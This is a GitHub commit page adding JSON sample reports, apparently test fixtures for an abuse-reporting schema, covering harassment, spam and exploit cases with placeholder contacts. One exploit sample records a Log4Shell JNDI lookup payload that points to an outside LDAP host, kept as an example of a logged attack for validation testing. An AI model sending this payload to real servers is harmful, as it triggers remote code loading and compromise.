-
Notifications
You must be signed in to change notification settings - Fork 19
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'origin' into schema-proposal-web-crawler
- Loading branch information
Showing
22 changed files
with
914 additions
and
348 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
18 changes: 18 additions & 0 deletions
18
samples/negative/development/harassment_sample_no_description.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Person", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Harassed McPerson", | ||
"ReporterContactPhone": "+ 01 555 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Harassed", | ||
"Date": "2022-09-09T14:17:10Z", | ||
"SourceUrl": "192.168.0.11", | ||
"Ongoing": true, | ||
"Harasser": "x.X.Fl4m3r.X.x" | ||
} | ||
} |
18 changes: 18 additions & 0 deletions
18
samples/negative/development/harassment_sample_no_harasser.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Person", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Harassed McPerson", | ||
"ReporterContactPhone": "+ 01 555 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Harassed", | ||
"Date": "2022-09-09T14:17:10Z", | ||
"SourceUrl": "192.168.0.11", | ||
"Ongoing": true, | ||
"HarassmentDescription": "The user called me a bunch of slurs." | ||
} | ||
} |
21 changes: 21 additions & 0 deletions
21
samples/negative/development/invalid_exploit_wrong_cve.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Mr. Example", | ||
"ReporterContactPhone": "+ 01 000 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportType": "Exploit", | ||
"ReportClass": "Activity", | ||
"FirstSeen": "2022-08-22T15:17:10Z", | ||
"Date": "2022-08-24T11:21:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321, | ||
"CVE": "CVE-NOW-23112" | ||
} | ||
} |
24 changes: 24 additions & 0 deletions
24
samples/negative/development/invalid_exploit_wrong_vector.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Mr. Example", | ||
"ReporterContactPhone": "+ 01 000 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportType": "Exploit", | ||
"ReportClass": "Activity", | ||
"FirstSeen": "2022-08-22T15:17:10Z", | ||
"Date": "2022-08-24T11:21:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321, | ||
"CVSS": { | ||
"Version": "2", | ||
"Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" | ||
} | ||
} | ||
} |
24 changes: 24 additions & 0 deletions
24
samples/negative/development/invalid_exploit_wrong_version.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Mr. Example", | ||
"ReporterContactPhone": "+ 01 000 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportType": "Exploit", | ||
"ReportClass": "Activity", | ||
"FirstSeen": "2022-08-22T15:17:10Z", | ||
"Date": "2022-08-24T11:21:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321, | ||
"CVSS": { | ||
"Version": "4", | ||
"Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" | ||
} | ||
} | ||
} |
23 changes: 23 additions & 0 deletions
23
samples/negative/development/invalid_missing_reporter_props4.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": [], | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Spam", | ||
"ReportSubType": "Trap", | ||
"Date": "2018-02-05T14:17:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321, | ||
"DestinationIp": "198.51.100.33", | ||
"DestinationPort": 25, | ||
"SmtpMailFromAddress": "[email protected]", | ||
"Samples": [ | ||
{ | ||
"ContentType": "message/rfc822", | ||
"Base64Encoded": true, | ||
"Description": "The spam mail", | ||
"Payload": "bWFpbA==" | ||
} | ||
] | ||
} | ||
} |
26 changes: 26 additions & 0 deletions
26
samples/negative/development/invalid_missing_reporter_props5.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com" | ||
}, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Spam", | ||
"ReportSubType": "Trap", | ||
"Date": "2018-02-05T14:17:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321, | ||
"DestinationIp": "198.51.100.33", | ||
"DestinationPort": 25, | ||
"SmtpMailFromAddress": "[email protected]", | ||
"Samples": [ | ||
{ | ||
"ContentType": "message/rfc822", | ||
"Base64Encoded": true, | ||
"Description": "The spam mail", | ||
"Payload": "bWFpbA==" | ||
} | ||
] | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Mr. Example", | ||
"ReporterContactPhone": "+ 01 000 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportType": "Exploit", | ||
"ReportClass": "Activity", | ||
"FirstSeen": "2022-08-22T15:17:10Z", | ||
"Date": "2022-08-24T11:21:10Z", | ||
"ServiceName": "Log4j", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321, | ||
"Samples": [ | ||
{ | ||
"ContentType": "text/plain", | ||
"Base64Encoded": false, | ||
"Description": "Log line", | ||
"Payload": "${jndi:ldap://123.123.123.123:1389/Exploit}" | ||
} | ||
], | ||
"DestinationIp": "123.123.123.123", | ||
"DestinationPort": 1389, | ||
"CVE": "CVE-2021-44228", | ||
"CVSS": { | ||
"Version": "3.1", | ||
"Score": 10.0, | ||
"Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Mr. Example", | ||
"ReporterContactPhone": "+ 01 000 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportType": "Exploit", | ||
"ReportClass": "Activity", | ||
"FirstSeen": "2022-08-22T15:17:10Z", | ||
"Date": "2022-08-24T11:21:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321 | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Person", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Harassed McPerson", | ||
"ReporterContactPhone": "+ 01 555 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Harassment", | ||
"Date": "2022-09-09T14:17:10Z", | ||
"SourceUrl": "https://thepetgoatgame.play", | ||
"Ongoing": true, | ||
"Harasser": "x.X.Fl4m3r.X.x", | ||
"HarassmentLocation": "game", | ||
"HarassmentType": "hate", | ||
"HarassmentDescription": "The user called me a bunch of slurs." | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Person", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Harassed McPerson", | ||
"ReporterContactPhone": "+ 01 555 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Harassment", | ||
"Date": "2022-09-09T14:17:10Z", | ||
"SourceUrl": "https://social.media/comment/87896745329", | ||
"Ongoing": true, | ||
"Harasser": "ForumUser123", | ||
"HarassmentLocation": "website", | ||
"HarassmentType": "doxing", | ||
"HarassmentDescription": "Someone leaked my private home address with the intention of directing hate at me.", | ||
"Samples": [ | ||
{ | ||
"ContentType": "image/png", | ||
"Base64Encoded": true, | ||
"Description": "Image of the comment leaking my address", | ||
"Payload": "iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAMAAAAolt3jAAAAPFBMVEUZGyDBx8wyNTq5v8Sr\nsbYqLDFDRkvK0daEiY5IS1DDyc6vtbqiqK2LkZaIjpN1eX5cX2Q+QUYoKzAfISa2fY/BAAAA\nQElEQVQI12PAD5iYoQwBRiFkriCHMIKLUMzPyM3EwMDDxQjmsnMycPACGawQLpDkZIFwoXrZ\nSOUyMrIz8hFwMgCL5QFBsWv97gAAAABJRU5ErkJggg==" | ||
} | ||
] | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Person", | ||
"ReporterContactEmail": "[email protected]", | ||
"ReporterContactName": "Harassed McPerson", | ||
"ReporterContactPhone": "+ 01 555 1234567" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Harassment", | ||
"Date": "2022-09-09T14:17:10Z", | ||
"SourceUrl": "http://irc.5ch.net", | ||
"Ongoing": true, | ||
"Harasser": "@notarealperson", | ||
"HarassmentDescription": "@notarealperson has published a deepfake of me doing something illegal, claiming that it was really me that did it.", | ||
"HarassmentType": "defamation", | ||
"HarassmentLocation": "chat", | ||
"Samples": [ | ||
{ | ||
"ContentType": "image/x-uri", | ||
"Base64Encoded": false, | ||
"Description": "Url to an image ", | ||
"Payload": "https://imagehostingservice.tld/image/123456789" | ||
} | ||
] | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Spam", | ||
"Date": "2018-02-05T14:17:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321 | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Org", | ||
"ReporterOrg": "ExampleOrg", | ||
"ReporterOrgDomain": "example.com", | ||
"ReporterOrgEmail": "[email protected]" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Spam", | ||
"Date": "2018-02-05T14:17:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321 | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
{ | ||
"Version": "development", | ||
"ReporterInfo": { | ||
"ReporterType": "Person", | ||
"ReporterOrg": "ExampleOrg" | ||
}, | ||
"Disclosure": true, | ||
"Report": { | ||
"ReportClass": "Activity", | ||
"ReportType": "Spam", | ||
"Date": "2018-02-05T14:17:10Z", | ||
"SourceIp": "192.0.2.55", | ||
"SourcePort": 54321 | ||
} | ||
} |
Oops, something went wrong.